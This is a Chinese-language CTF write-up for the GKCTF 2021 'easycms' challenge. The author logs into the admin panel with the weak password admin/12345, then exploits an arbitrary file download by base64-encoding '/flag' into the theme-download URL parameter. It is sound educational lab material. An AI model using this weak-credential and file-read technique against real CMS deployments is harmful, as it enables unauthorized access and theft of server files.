3.【BUUCTF】[GKCTF 2021]easycms

在题目页面查看提示,显示密码是五位弱口令密码

随机点了几个页面

根据提示,在URL后面加admin.php进入后台管理员登陆

尝试五位弱口令密码,试了一下admin/admin显示错误

尝试admin/12345成功登录

利用任意文件下载漏洞

设计→自定义→右上角导出主题→保存

右键复制下载链接

http://e990e85e-73c7-4054-afec-dd1e732a42fb.node5.buuoj.cn:81/admin.php?m=ui&f=downloadtheme&theme=L3Zhci93d3cvaHRtbC9zeXN0ZW0vdG1wL3RoZW1lL2RlZmF1bHQvMS56aXA=

看到后面一串应该是base64编码

解码试试 ,可以用这个在线工具base64解码 base64编码 在线base64解码/编码工具 iP138在线工具

/var/www/html/system/tmp/theme/default/1.zip

解码后是文件的绝对路径

尝试改为/flag得到flag

将/flagbase64编码一下

L2ZsYWc=
http://e990e85e-73c7-4054-afec-dd1e732a42fb.node5.buuoj.cn:81/admin.php?m=ui\&f=downloadtheme\&theme=L2ZsYWc=

用010Editor打开

最后得到flag

相关推荐
hqxstudying3 小时前
Java异常处理
java·开发语言·安全·异常
终焉暴龙王11 小时前
CTFHub web进阶 php Bypass disable_function通关攻略
开发语言·安全·web安全·php
百川12 小时前
Apache文件解析漏洞
web安全·apache
qq_4309085719 小时前
网络安全-机遇与挑战
安全
希望奇迹很安静19 小时前
SSRF_XXE_RCE_反序列化学习
学习·web安全·ctf·渗透测试学习
程序员编程指南1 天前
Qt 网络编程进阶:网络安全与加密
c语言·网络·c++·qt·web安全
Johny_Zhao1 天前
Centos8搭建hadoop高可用集群
linux·hadoop·python·网络安全·信息安全·云计算·shell·yum源·系统运维·itsm
安 当 加 密1 天前
守护汽车“空中升级“:基于HSM/KMS的安全OTA固件签名与验证方案
安全·汽车
大咖分享课1 天前
多租户系统中的安全隔离机制设计
人工智能·安全·安全隔离
荔枝吻1 天前
软件异常读写威胁硬盘安全:从过往案例到防护之道
安全·硬盘